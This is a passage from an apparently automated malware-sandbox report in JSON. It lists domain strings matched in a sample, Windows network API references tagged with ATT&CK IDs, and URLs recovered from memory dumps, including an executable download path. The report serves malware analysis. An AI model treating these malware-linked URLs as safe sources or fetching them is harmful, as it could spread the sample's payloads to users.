\"rtb.4finance.com\"\n Pattern match: \"www.msn.com\"\n Heuristic match: \"lightboxcdn.com\"\n Heuristic match: \"pi.pardot.com\"\n Heuristic match: \"indiatimes.com\"\n Heuristic match: \"pixel.keywee.co\"\n Pattern match: \"www.oricon.co.jp\"\n Heuristic match: \"springserve.com\"\n Heuristic match: \"accuweather.com\"\n Pattern match: \"www.pixnet.net\"\n Heuristic match: \"adsymptotic.com\"\n Heuristic match: \"groupon.co.uk\"\n Heuristic match: \"pclady.com.cn\"\n Pattern match: \"www.corriere.it\"\n Heuristic match: \"casalemedia.com\"\n Heuristic match: \"mediaplex.com\"\n Heuristic match: \"tns-counter.ru\"\n Heuristic match: \"ads.linkedin.com\"\n Heuristic match: \"eastmoney.com\"\n Heuristic match: \"mtvnservices.com\"\n Heuristic match: \"freegeoip.net\"\n Heuristic match: \"connexity.net\"\n Pattern match: \"www.avast.com\"\n Heuristic match: \"infoseek.co.jp\"\n Heuristic match: \"tap2-cdn.rubiconproject.com\"\n Heuristic match: \"8428790487.log.optimizely.com\"\n Heuristic match: \"izlesene.com\"\n Heuristic match: \"trugaze.io\"\n Heuristic match: \"youku.com\"\n Heuristic match: \"ip138.com\"\n Heuristic match: \"gssprt.jp\"\n Heuristic match: \"baidu.com\"\n Heuristic match: \"semasio.net\"\n Heuristic match: \"kuwan8.com\"\n Pattern match: \"www.aa.com\"\n Pattern match: \"www.irs.gov\"\n Heuristic match: \"owneriq.net\"\n Heuristic match: \"t-mobile.com\"\n Heuristic match: \"conectiva.io\"\n Heuristic match: \"ngfiles.com\"\n Heuristic match: \"gamespot.com\"\n Heuristic match: \"abtasty.com\"\n Heuristic match: \"adhigh.net\"\n Heuristic match: \"zoosnet.net\"\n Heuristic match: \"yahoo.com\"\n Heuristic match: \"yabidos.com\"\n Heuristic match: \"pardot.com\"\n Heuristic match: \"kugou.com\"\n Heuristic match: \"wbtrk.net\"\n Heuristic match: \"stardoll.com\"\n Heuristic match: \"adnxs.com\"\n Heuristic match: \"bitauto.com\"\n Heuristic match: \"esmas.com\"\n Heuristic match: \"adtdp.com\"\n Heuristic match: \"tidaltv.com\"\n Heuristic match: \"meituan.com\"\n Heuristic match: \"tw.yahoo.com\"\n Heuristic match: \"11st.co.kr\"\n Heuristic match: \"break.com\"\n Heuristic match: \"youdao.com\"\n Heuristic match: \"mashable.com\"\n Heuristic match: \"wrating.com\"\n Heuristic match: \"livedoor.com\"\n Heuristic match: \"85play.com\"\n Heuristic match: \"next.co.uk\"\n Heuristic match: \"newscgp.com\"\n Heuristic match: \"videoamp.com\"\n Heuristic match: \"openx.net\"\n Heuristic match: \"irs01.com\"\n Heuristic match: \"weborama.com\"\n Heuristic match: \"dotomi.com\"\n Heuristic match: \"pingdom.net\"\n Heuristic match: \"kpruanalytics.solution.weborama.fr\"\n Pattern match: \"www.americanas.com.br\"\n Pattern match: \"www.juegosdiarios.com\"\n Heuristic match: \"tap.rubiconproject.com\"\n Heuristic match: \"api.webdata.ledu.com\"\n Heuristic match: \"scorecardresearch.com\"\n Heuristic match: \"technical-service.net\"\n Heuristic match: \"nationalgeographic.com\"\n Pattern match: \"www.urbandictionary.com\"\n Heuristic match: \"kakakucom.112.2o7.net\"\n Pattern match: \"www.reuters.wallst.com\"\n Heuristic match: \"pixel.rubiconproject.com\"\n Heuristic match: \"ads.creative-serving.com\"\n Heuristic match: \"adaptv.advertising.com\"\n Pattern match: \"www.tripadvisor.co.uk\"\n Pattern match: \"www.credit-agricole.fr\"\n Heuristic match: \"adobe.tt.omtrdc.net\"\n Pattern match: \"www.liveadexchanger.com\"\n Heuristic match: \"moc.sys-gnivres.sb\"\n Heuristic match: \"bs.serving-sys.com\"\n Heuristic match: \"dotlinux02.doubledot.es\"\n Heuristic match: \"national-lottery.co.uk\"\n Heuristic match: \"laredoute.commander1.com\"\n Heuristic match: \"statse.webtrendslive.com\"\n Heuristic match: \"neural09.cdnwebcloud.com\"\n Heuristic match: \"naver.jp\"\n Heuristic match: \"7k7k.com\"\n Heuristic match: \"ioam.de\"\n Heuristic match: \"java.com\"\n Heuristic match: \"tanx.com\"\n Heuristic match: \"songs.pk\"\n Heuristic match: \"fout.jp\"\n Heuristic match: \"2ch.net\"\n Heuristic match: \"9223.com\"\n Heuristic match: \"krxd.net\"\n Heuristic match: \"popin.cc\"\n Heuristic match: \"daum.net\"\n Heuristic match: \"yimg.com\"\n Heuristic match: \"knet.cn\"\n Heuristic match: \"xiti.com\"\n Heuristic match: \"rk.oc.tm\"\n Heuristic match: \"mt.co.kr\"\n Heuristic match: \"webs.com\"\n Heuristic match: \"etsy.com\"\n Heuristic match: \"nasa.gov\"\n Heuristic match: \"hulu.com\"\n Heuristic match: \"ikea.com\"\n Heuristic match: \"3366.com\"\n Heuristic match: \"w55c.net\"\n Heuristic match: \"moc.ae\"\n Heuristic match: \"ea.com\"\n Heuristic match: \"ning.com\"\n Heuristic match: \"wwe.com\"\n Heuristic match: \"pho.to\"\n Heuristic match: \"csdn.net\"\n Heuristic match: \"g.58.com\"\n Heuristic match: \"dell.com\"\n Heuristic match: \"ebay.com\"\n Heuristic match: \"cpx.to\"\n Heuristic match: \"pof.com\"\n Heuristic match: \"yoka.com\"\n Heuristic match: \"1rx.io\"\n Heuristic match: \"bing.com\"\n Heuristic match: \"teads.tv\"\n Heuristic match: \"2o7.net\"\n Heuristic match: \"vk.com\"\n Heuristic match: \"m18.com\"\n Heuristic match: \"m6r.eu\"\n Heuristic match: \"ebay.it\"\n Heuristic match: \"ups.com\"\n Heuristic match: \"mtv.com\"\n Heuristic match: \"ing.nl\"\n Heuristic match: \"mail.ru\"\n Heuristic match: \"king.com\"\n Heuristic match: \"turn.com\"\n Heuristic match: \"ledu.com\"\n Heuristic match: \"smi2.net\"\n Heuristic match: \"yadro.ru\"\n Heuristic match: \"l.qq.com\"\n Heuristic match: \"zedo.com\"\n Heuristic match: \"kbb.com\"\n Heuristic match: \"goal.com\"\n Heuristic match: \"ya.ru\"\n Heuristic match: \"erne.co\"\n Heuristic match: \"imvu.com\"\n Heuristic match: \"wat.tv\"\n Heuristic match: \"sapo.pt\"\n Heuristic match: \"96pk.com\"\n Heuristic match: \"image.livedoor.com\"\n Heuristic match: \"amazon-adsystem.com\"\n Heuristic match: \"giveawayoftheday.com\"\n Heuristic match: \"pzd.rakuten.co.jp\"\n Heuristic match: \"stats02.topix.com\"\n Pattern match: \"www.firstload.com\"\n Heuristic match: \"rubiconproject.com\"\n Pattern match: \"www.groupon.co.uk\"\n Heuristic match: \"wordreference.com\"\n Pattern match: \"www.foodnetwork.com\"\n Heuristic match: \"juegosdiarios.com\"\n Heuristic match: \"bpid.bigpoint.net\"\n Pattern match: \"www.virginmedia.com\"\n Heuristic match: \"trtstats.topix.com\"\n Heuristic match: \"count.pclady.com.cn\"\n Pattern match: \"www.tripadvisor.com\"\n Heuristic match: \"bbs.aoshitang.com\"\n Pattern match: \"www.whitepages.com\"\n Heuristic match: \"whisky.ana.stg8.com\"\n Heuristic match: \"globalwebindex.net\"\n Pattern match: \"www.buenastareas.com\"\n Heuristic match: \"server.seadform.net\"\n Pattern match: \"www.autotrader.co.uk\"\n Heuristic match: \"bedbathandbeyond.com\"\n Pattern match: \"www.accuweather.com\"\n Heuristic match: \"howstuffworks.com\"\n Heuristic match: \"webcollect.kugou.com\"\n Pattern match: \"www.submarino.com.br\"\n Heuristic match: \"worldstarhiphop.com\"\n Heuristic match: \"autouk.demdex.net\"\n Heuristic match: \"dmg.digitaltarget.ru\"\n Heuristic match: \"ezinearticles.com\"\n Heuristic match: \"brightonclick.com\"\n Heuristic match: \"strawberryperl.com\"\n Heuristic match: \"americanas.com.br\"\n Pattern match: \"www.southwest.com\"\n Heuristic match: \"ads.stickyadstv.com\"\n Heuristic match: \"verizonwireless.com\"\n Pattern match: \"www.thecredits.org\"\n Heuristic match: \"xunlei.com\"\n Heuristic match: \"cxense.com\"\n Heuristic match: \"xfinity.com\"\n Heuristic match: \"hubpages.com\"\n Heuristic match: \"mookie1.com\"\n Heuristic match: \"marinsm.com\"\n Pattern match: \"www.wsj.com\"\n Heuristic match: \"ad-stir.com\"\n Heuristic match: \"yaplog.jp\"\n Heuristic match: \"miaozhen.com\"\n Heuristic match: \"amazon.de\"\n Heuristic match: \"webkinz.com\"\n Heuristic match: \"iza.ne.jp\"\n Heuristic match: \"soflopxl.com\"\n Heuristic match: \"patch.com\"\n Heuristic match: \"s3xified.com\"\n Heuristic match: \"united.com\"\n Heuristic match: \"zimbio.com\"\n Heuristic match: \"p.crm4d.com\"\n Heuristic match: \"114la.com\"\n Heuristic match: \"adgrx.com\"\n Heuristic match: \"topixcdn.com\"\n Heuristic match: \"weather.gov\"\n Heuristic match: \"cbsnews.com\"\n Heuristic match: \"seadform.net\"\n Heuristic match: \"c.bing.com\"\n Pattern match: \"www.fifa.com\"\n Heuristic match: \"sogou.com\"\n Heuristic match: \"net.finam.ru\"\n Heuristic match: \"topix.com\"\n Heuristic match: \"impdesk.com\"\n Heuristic match: \"outbrain.com\"\n Heuristic match: \"rising.cn\"\n Heuristic match: \"itsfogo.com\"\n Heuristic match: \"innovid.com\"\n Heuristic match: \"trialpay.com\"\n Heuristic match: \"yieldmo.com\"\n Heuristic match: \"tesco.com\"\n Heuristic match: \"thench.net\"\n Heuristic match: \"iqiyi.com\"\n Heuristic match: \"google.es\"\n Heuristic match: \"yieldlab.net\"\n Pattern match: \"www.onet.pl\"\n Heuristic match: \"rfihub.com\"\n Heuristic match: \"criteo.com\"\n Heuristic match: \"gosunpro.com\"\n Heuristic match: \"xdating.com\"\n Pattern match: \"www.pof.com\"\n Heuristic match: \"mobile.de\"\n Heuristic match: \"ml314.com\"\n Heuristic match: \"adotmob.com\"\n Heuristic match: \"thesun.co.uk\"\n Heuristic match: \"xcar.com.cn\"\n Heuristic match: \"scanscout.com\"\n Heuristic match: \"vagalume.com.br\"\n Heuristic match: \"flashtalking.com\"\n Pattern match: \"www.ryanair.com\"\n Pattern match: \"www.reuters.com\"\n Pattern match: \"www.toysrus.com\"\n Heuristic match: \"sharethrough.com\"\n Heuristic match: \"myvisualiq.net\"\n Heuristic match: \"doubleclick.net\"\n Heuristic match: \"undertone.com\"\n Heuristic match: \"espncricinfo.com\"\n Pattern match: \"www.nextag.com\"\n Pattern match: \"www.foxnews.com\"\n Heuristic match: \"send.microad.jp\"\n Heuristic match: \"ads.pubmatic.com\"\n Heuristic match: \"track.wvtu.net\"\n Heuristic match: \"etsystudio.com\"\n Pattern match: \"www.drugs.com\"\n Heuristic match: \"dantri.com.vn\"\n Heuristic match: \"onesignal.com\"\n Heuristic match: \"creativecdn.com\"\n Heuristic match: \"ad.360yield.com\"\n Heuristic match: \"ads.webkinz.com\"\n Pattern match: \"www.usatoday.com\"\n Heuristic match: \"my.rtmark.net\"\n Pattern match: \"www.agame.com\"\n Heuristic match: \"hubstatic.com\"\n Heuristic match: \"travelzoo.com\"\n Heuristic match: \"moviefone.com\"\n Pattern match: \"www.aipai.com\"\n Heuristic match: \"tripadvisor.com\"\n Pattern match: \"www.latimes.com\"\n Pattern match: \"www.mp3raid.xyz\"\n Heuristic match: \"thecredits.org\"\n Heuristic match: \"dpm.demdex.net\"\n Heuristic match: \"sundaysky.com\"\n Heuristic match: \"switchadhub.com\"\n Heuristic match: \"ipredictive.com\"\n Heuristic match: \"quantserve.com\"\n Heuristic match: \"autoitscript.com\"\n Heuristic match: \"statcounter.com\"\n Heuristic match: \"yumenetworks.com\"\n Heuristic match: \"minijuegos.com\"\n Heuristic match: \"slideshare.net\"\n Heuristic match: \"stars.topix.com\"\n Heuristic match: \"moc.tniopgib.se\"\n Heuristic match: \"es.bigpoint.com\"\n Pattern match: \"www.livedoor.com\"\n Heuristic match: \"craigslist.org\"\n Pattern match: \"www.nationalgeographic.com\"\n Heuristic match: \"login.microsoftonline.com\"\n Heuristic match: \"match.adsby.bidtheatre.com\"\n Heuristic match: \"621373388.log.optimizely.com\"\n Heuristic match: \"58011369.log.optimizely.com\"\n Heuristic match: \"200632758.log.optimizely.com\"\n Heuristic match: \"renren.com\"\n Heuristic match: \"makepolo.com\"\n Heuristic match: \"mthai.com\"\n Heuristic match: \"gumtree.com\"\n Heuristic match: \"melia.com\"\n Heuristic match: \"wikihow.com\"\n Heuristic match: \"verizon.com\"\n Pattern match: \"www.citi.com\"\n Heuristic match: \"yahoo.co.jp\"\n Heuristic match: \"scribd.com\"\n Heuristic match: \"weborama.fr\"\n Heuristic match: \"51job.com\"\n Heuristic match: \"demdex.net\"\n Heuristic match: \"extend.tv\"\n Heuristic match: \"norton.com\"\n Heuristic match: \"answers.com\"\n Heuristic match: \"aipai.com\"\n Heuristic match: \"3lift.com\"\n Heuristic match: \"mxptint.net\"\n Heuristic match: \"xtgreat.com\"\n Heuristic match: \"taboola.com\"\n Heuristic match: \"exblog.jp\"\n Heuristic match: \"media.net\"\n Heuristic match: \"adobe.com\"\n Heuristic match: \"drugs.com\"\n Heuristic match: \"oracle.com\"\n Heuristic match: \"jivox.com\"\n Heuristic match: \"friend.ly\"\n Heuristic match: \"wupload.com\"\n Heuristic match: \"logly.co.jp\"\n Heuristic match: \"gametop.com\"\n Pattern match: \"www.gov.uk\"\n Heuristic match: \"hotwire.com\"\n Heuristic match: \"adhood.com\"\n Heuristic match: \"sanspo.com\"\n Heuristic match: \"mmstat.com\"\n Heuristic match: \"teacup.com\"\n Heuristic match: \"virgul.com\"\n Heuristic match: \"rockyou.net\"\n Heuristic match: \"nicovideo.jp\"\n Heuristic match: \"im-apps.net\"\n Heuristic match: \"adingo.jp\"\n Heuristic match: \"socdm.com\"\n Heuristic match: \"agame.com\"\n Heuristic match: \"eonline.com\"\n Heuristic match: \"altergeo.ru\"\n Heuristic match: \"yoyi.com.cn\"\n Heuristic match: \"adtechus.com\"\n Heuristic match: \"zillow.com\"\n Heuristic match: \"keyade.com\"\n Heuristic match: \"qunar.com\"\n Heuristic match: \"addthis.com\"\n Heuristic match: \"durasite.net\"\n Heuristic match: \"adriver.ru\"\n Heuristic match: \"tao123.com\"\n Heuristic match: \"gwallet.com\"\n Heuristic match: \"shopathome.com\"\n Heuristic match: \"lineadirecta.com\"\n Heuristic match: \"shockwave.com\"\n Heuristic match: \"postrelease.com\"\n Heuristic match: \"visualdna.com\"\n Pattern match: \"www.iqiyi.com\"\n Heuristic match: \"liutilities.com\"\n Heuristic match: \"superpages.com\"\n Heuristic match: \"acxiomapac.com\"\n Heuristic match: \"dlx.addthis.com\"\n Heuristic match: \"websimages.com\"\n Pattern match: \"www.scribd.com\"\n Heuristic match: \"reference.com\"\n Pattern match: \"www.lazada.vn\"\n Heuristic match: \"nexac.demdex.net\"\n Heuristic match: \"nickelodeon.es\"\n Heuristic match: \"ke.youdao.com\"\n Pattern match: \"www.compado.es\"\n Pattern match: \"www.linkedin.com\"\n Heuristic match: \"optimatic.com\"\n Pattern match: \"www.amazon.com\"\n Pattern match: \"www.aweber.com\"\n Heuristic match: \"domaintools.com\"\n Heuristic match: \"doctissimo.fr\"\n Heuristic match: \"gmarket.co.kr\"\n Heuristic match: \"tripod.lycos.com\"\n Pattern match: \"www.musica.com\"\n Heuristic match: \"serve.popads.net\"\n Heuristic match: \"southwest.com\"\n Heuristic match: \"city-data.com\"\n Heuristic match: \"adventori.com\"\n Heuristic match: \"rcsmetrics.it\"\n Heuristic match: \"4paradigm.com\"\n Heuristic match: \"craigslist.es\"\n Heuristic match: \"capitalone.com\"\n Heuristic match: \"monografias.com\"\n Heuristic match: \"milliyet.com.tr\"\n Heuristic match: \"foodnetwork.com\"\n Heuristic match: \"everesttech.net\"\n Pattern match: \"www.zimbio.com\"\n Pattern match: \"www.hc360.com\"\n Pattern match: \"www.izlesene.com\"\n Pattern match: \"www.stardoll.com\"\n Heuristic match: \"flipboard.com\"\n Heuristic match: \"piximedia.com\"\n Heuristic match: \"atwiki.jp\"\n Heuristic match: \"globo.com\"\n Heuristic match: \"vtracy.de\"\n Heuristic match: \"zappos.com\"\n Heuristic match: \"yandex.ru\"\n Heuristic match: \"europa.eu\"\n Heuristic match: \"ad.zanox.com\"\n Pattern match: \"www.kbb.com\"\n Pattern match: \"www.7k7k.com\"\n Heuristic match: \"antdsp.com\"\n Heuristic match: \"virool.com\"\n Pattern match: \"www.duba.com\"\n Heuristic match: \"asahi.com\"\n Heuristic match: \"elpais.com\"\n Heuristic match: \"yengo.com\"\n Heuristic match: \"adtechjp.com\"\n Heuristic match: \"bluekai.com\"\n Heuristic match: \"pubmatic.com\"\n Heuristic match: \"amazon.co.jp\"\n Heuristic match: \"ctnsnet.com\"\n Heuristic match: \"btrll.com\"\n Heuristic match: \"easydmp.net\"\n Heuristic match: \"mirtesen.ru\"\n Heuristic match: \"state.gov\"\n Heuristic match: \"kakaku.com\"\n Heuristic match: \"pixnet.net\"\n Heuristic match: \"aidata.io\"\n Heuristic match: \"eyeota.net\"\n Heuristic match: \"directv.com\"\n Heuristic match: \"mathtag.com\"\n Heuristic match: \"foxnews.com\"\n Heuristic match: \"deqwas.net\"\n Pattern match: \"www.ing.nl\"\n Heuristic match: \"laredoute.fr\"\n Heuristic match: \"addtoany.com\"\n Heuristic match: \"fandango.com\"\n Heuristic match: \"netseer.com\"\n Heuristic match: \"softonic.com\"\n Heuristic match: \"glotgrx.com\"\n Heuristic match: \"hc360.com\"\n Heuristic match: \"adsrvr.org\"\n Heuristic match: \"4shared.com\"\n Heuristic match: \"facebook.com\"\n Heuristic match: \"abril.com.br\"\n Heuristic match: \"duote.com\"\n Heuristic match: \"usafis.org\"\n Heuristic match: \"hubspot.net\"\n Heuristic match: \"netmng.com\"\n Heuristic match: \"365profx.com\"\n Heuristic match: \"simpli.fi\"\n Heuristic match: \"latimes.com\"\n Heuristic match: \"reuters.com\"\n Heuristic match: \"ryanair.com\"\n Heuristic match: \"toysrus.com\"\n Heuristic match: \"districtm.ca\"\n Heuristic match: \"rlcdn.com\"\n Heuristic match: \"legolas-media.com\"\n Pattern match: \"www.monografias.com\"\n Pattern match: \"www.maxonclick.com\"\n Heuristic match: \"acuityplatform.com\"\n Heuristic match: \"power.gosunpro.com\"\n Heuristic match: \"ads.programattik.com\"\n Heuristic match: \"company-target.com\"\n Pattern match: \"www.warnerbros.com\"\n Pattern match: \"www.rakuten.co.jp\"\n Heuristic match: \"gateway.foresee.com\"\n Heuristic match: \"liveadexchanger.com\"\n Pattern match: \"www.wunderground.com\"\n Heuristic match: \"bleacherreport.com\"\n Heuristic match: \"smartadserver.com\"\n Heuristic match: \"cstatic.weborama.fr\"\n Heuristic match: \"beacon.walmart.com\"\n Pattern match: \"www.pagesjaunes.fr\"\n Pattern match: \"www.superpages.com\"\n Pattern match: \"www.milliyet.com.tr\"\n Heuristic match: \"counter.pixplug.in\"\n Heuristic match: \"angelfire.lycos.com\"\n Heuristic match: \"s.thebrighttag.com\"\n Heuristic match: \"sxp.smartclip.net\"\n Pattern match: \"www.newgrounds.com\"\n Heuristic match: \"sp1.convertro.com\"\n Heuristic match: \"moshimonsters.com\"\n Pattern match: \"www.cheapoair.com\"\n Pattern match: \"www.instagram.com\"\n Heuristic match: \"same.eastmoney.com\"\n Heuristic match: \"addictinggames.com\"\n Heuristic match: \"bankofamerica.com\"\n Heuristic match: \"tripadvisor.co.uk\"\n Pattern match: \"www.espncricinfo.com\"\n Heuristic match: \"horyzon-media.com\"\n Pattern match: \"www.pcauto.com.cn\"\n Heuristic match: \"people.com.cn\"\n Heuristic match: \"xpg.uol.com.br\"\n Heuristic match: \"nakanohito.jp\"\n Heuristic match: \"hit.gemius.pl\"\n Heuristic match: \"babycenter.com\"\n Heuristic match: \"mtvn.demdex.net\"\n Heuristic match: \"imrworldwide.com\"\n Heuristic match: \"i-mobile.co.jp\"\n Heuristic match: \"velocecdn.com\"\n Heuristic match: \"priceline.com\"\n Heuristic match: \"sitescout.com\"\n Heuristic match: \"shutterfly.com\"\n Pattern match: \"www.answers.com\"\n Heuristic match: \"track.adform.net\"\n Heuristic match: \"walgreens.com\"\n Heuristic match: \"it.ebayrtm.com\"\n Heuristic match: \"autoscout24.be\"\n Heuristic match: \"autotrader.com\"\n Heuristic match: \"baixaki.com.br\"\n Heuristic match: \"pos.baidu.com\"\n Heuristic match: \"infolinks.com\"\n Heuristic match: \"blackberry.com\"\n Pattern match: \"www2.bing.com\"\n Pattern match: \"www.goo.ne.jp\"\n Heuristic match: \"dowjoneson.com\"\n Heuristic match: \"pixanalytics.com\"\n Pattern match: \"www.sanspo.com\"\n Pattern match: \"www.teacup.com\"\n Pattern match: \"www.zillow.com\"\n Heuristic match: \"linternaute.com\"\n Heuristic match: \"usmagazine.com\"\n Pattern match: \"www.gosunpro.com\"\n Pattern match: \"www.xfinity.com\"\n Heuristic match: \"serving-sys.com\"\n Heuristic match: \"rakuten.co.jp\"\n Heuristic match: \"gamesgames.com\"\n Heuristic match: \"skysports.com\"\n Heuristic match: \"autotrader.co.uk\"\n Heuristic match: \"contextweb.com\"\n Heuristic match: \"armorgames.com\"\n Heuristic match: \"dragonfable.com\"\n Pattern match: \"www.jalan.net\"\n Heuristic match: \"blogcu.com\"\n Pattern match: \"www.free.fr\"\n Heuristic match: \"ligadx.com\"\n Heuristic match: \"sahcdn.com\"\n Heuristic match: \"moc.udiab.mh\"\n Heuristic match: \"hm.baidu.com\"\n Heuristic match: \"api.bing.com\"\n Pattern match: \"www.pnc.com\"\n Heuristic match: \"pixnet.cc\"\n Heuristic match: \"360doc.com\"\n Heuristic match: \"liadm.com\"\n Heuristic match: \"python.org\"\n Heuristic match: \"docin.com\"\n Heuristic match: \"moc.hctam.se\"\n Heuristic match: \"es.match.com\"\n Heuristic match: \"zemanta.com\"\n Heuristic match: \"oricon.co.jp\"\n Heuristic match: \"pj.abema.nl\"\n Heuristic match: \"ln.ameba.jp\"\n Heuristic match: \"lashou.com\"\n Heuristic match: \"cookpad.com\"\n Heuristic match: \"hao123.com\"\n Heuristic match: \"blizzard.com\"\n Heuristic match: \"rambler.ru\"\n Heuristic match: \"badoo.com\"\n Heuristic match: \"amazon.com\"\n Heuristic match: \"m0mentum.net\"\n Pattern match: \"www.ikea.com\"\n Heuristic match: \"atdmt.com\"\n Heuristic match: \"adswizz.com\"\n Heuristic match: \"libero.it\"\n Pattern match: \"www.webs.com\"\n Heuristic match: \"360daily.com\"\n Heuristic match: \"adrta.com\"\n Heuristic match: \"compado.es\"\n Heuristic match: \"mapquest.com\"\n Pattern match: \"www.3366.com\"\n Heuristic match: \"twitter.com\"\n Heuristic match: \"tagged.com\"\n Heuristic match: \"fidelity.com\"\n Heuristic match: \"youtube.com\"\n Heuristic match: \"foxtab.com\"\n Heuristic match: \"wretch.cc\"\n Heuristic match: \"60photos.com\"\n Heuristic match: \"aweber.com\"\n Heuristic match: \"weather.com\"\n Heuristic match: \"bigpoint.com\"\n Heuristic match: \"taobao.com\"\n Heuristic match: \"ebay.com.au\"\n Heuristic match: \"musica.com\"\n Heuristic match: \"wushen.com\"\n Heuristic match: \"exelator.com\"\n Heuristic match: \"navdmp.com\"\n Heuristic match: \"popads.net\"\n Heuristic match: \"douban.com\"\n Heuristic match: \"jxedt.com\"\n Heuristic match: \"dsp.io\"\n Heuristic match: \"kdata.fr\"\n Heuristic match: \"5ch.net\"\n Heuristic match: \"ask.com\"\n Heuristic match: \"citi.com\"\n Heuristic match: \"qvc.com\"\n Heuristic match: \"esm1.net\"\n Heuristic match: \"ur.pk\"\n Heuristic match: \"kp.ru\"\n Heuristic match: \"254a.com\"\n Heuristic match: \"hi5.com\"\n Heuristic match: \"58.com\"\n Heuristic match: \"chip.de\"\n Heuristic match: \"msn.com\"\n Heuristic match: \"web.de\"\n Heuristic match: \"abmr.net\"\n Heuristic match: \"imdb.com\"\n Heuristic match: \"tmz.com\"\n Heuristic match: \"eol.cn\"\n Heuristic match: \"51.com\"\n Heuristic match: \"bild.de\"\n Heuristic match: \"1dmp.io\"\n Heuristic match: \"alot.com\"\n Heuristic match: \"smi2.ru\"\n Heuristic match: \"adscale.de\"\n Pattern match: \"www.pof.es\"\n Heuristic match: \"buzzle.com\"\n Pattern match: \"www.ning.com\"\n Pattern match: \"www.kp.ru\"\n Heuristic match: \"kohls.com\"\n Heuristic match: \"impact-ad.jp\"\n Heuristic match: \"corriere.it\"\n Heuristic match: \"mynet.com\"\n Heuristic match: \"bla01.com\"\n Heuristic match: \"gnavi.co.jp\"\n Heuristic match: \"metacafe.com\"\n Heuristic match: \"adyun.com\"\n Pattern match: \"www.sapo.pt\"\n Heuristic match: \"stat.eol.cn\"\n Heuristic match: \"digitru.st\"\n Pattern match: \"www.eol.cn\"\n Heuristic match: \"afy11.net\"\n Heuristic match: \"i.liadm.com\"\n Heuristic match: \"angsrvr.com\"\n Heuristic match: \"adform.net\"\n Heuristic match: \"moevideo.net\"\n Pattern match: \"www.bing.com\"\n Heuristic match: \"nexage.com\"\n Heuristic match: \"districtm.io\"\n Heuristic match: \"tapad.com\"\n Heuristic match: \"gismeteo.ru\"\n Heuristic match: \"linkedin.com\"\n Heuristic match: \"deloton.com\"\n Heuristic match: \"c.msn.com\"\n Heuristic match: \"goo.ne.jp\"\n Heuristic match: \"readme.ru\"\n Heuristic match: \"bat.bing.com\"\n Heuristic match: \"rutube.ru\"\n Pattern match: \"www.qvc.com\"\n Heuristic match: \"wayfair.com\"\n Heuristic match: \"bttrack.com\"\n Heuristic match: \"ournba.net\"\n Heuristic match: \"toshiba.com\"\n Heuristic match: \"beemp3s.org\"\n Heuristic match: \"qtmojo.com\"\n Heuristic match: \"piriform.com\"\n Heuristic match: \"adtech.de\"\n Heuristic match: \"ixiaa.com\"\n Pattern match: \"www.gmx.net\"\n Heuristic match: \"jalan.net\"\n Heuristic match: \"nextag.com\"\n Heuristic match: \"crwdcntrl.net\"\n Pattern match: \"www.mynet.com\"\n Heuristic match: \"justanswer.com\"\n Heuristic match: \"pcauto.com.cn\"\n Heuristic match: \"mediafire.com\"\n Heuristic match: \"netshoes.com.br\"\n Heuristic match: \"cheapoair.com\"\n Heuristic match: \"matome.naver.jp\"\n Heuristic match: \"advertising.com\"\n Pattern match: \"www.match.com\"\n Heuristic match: \"sync.shinobi.jp\"\n Heuristic match: \"commander1.com\"\n Heuristic match: \"j.mrpdata.net\"\n Heuristic match: \"homedepot.com\"\n Pattern match: \"www.kohls.com\"\n Heuristic match: \"accengage.net\"\n Heuristic match: \"brothersoft.com\"\n Heuristic match: \"allabout.co.jp\"\n Heuristic match: \"bidswitch.net\"\n Pattern match: \"www.meetic.es\"\n Heuristic match: \"enfemenino.com\"\n Heuristic match: \"; .nl\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-539", "type": 2, "relevance": 1, "name": "Contains reference to Windows internet services (API string)", "description": "Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-419", "type": 2, "relevance": 1, "name": "Contains ability to open a port and listen for incoming connection (API string)", "description": "Found reference to API \"setsockopt\" (Indicator: \"setsockopt\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")", "origin": "File/Memory", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "memorydump-2", "type": 20, "relevance": 1, "name": "Found potential URLs in memory dumps", "description": "Found URL \"http://www.zigui.org/article.php?id=103822sers<\" - Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp\")\n Found URL \"http://www.3721.com/adjusttime.htmmozilla/4.0\" - Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found URL \"http://%s/https://http://abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/=quitdele\" - Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found URL \"http://www.mxm9191.com/myrunner_up.exehttp://www.zigui.org/article.php?id=103822.exe.exe.exe.exeqqtalk.execctv.exeflash.exeflash.exe.exeflash.exe.exe.exe.exe.exe.exemerrychristmasinternatinternat.exemspbint.exemspsint.exemssysint.exeiexplore\" - Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"\n \"<IPv4>\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"HttpSendRequestA\" (Indicator: \"HttpSendRequest\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: 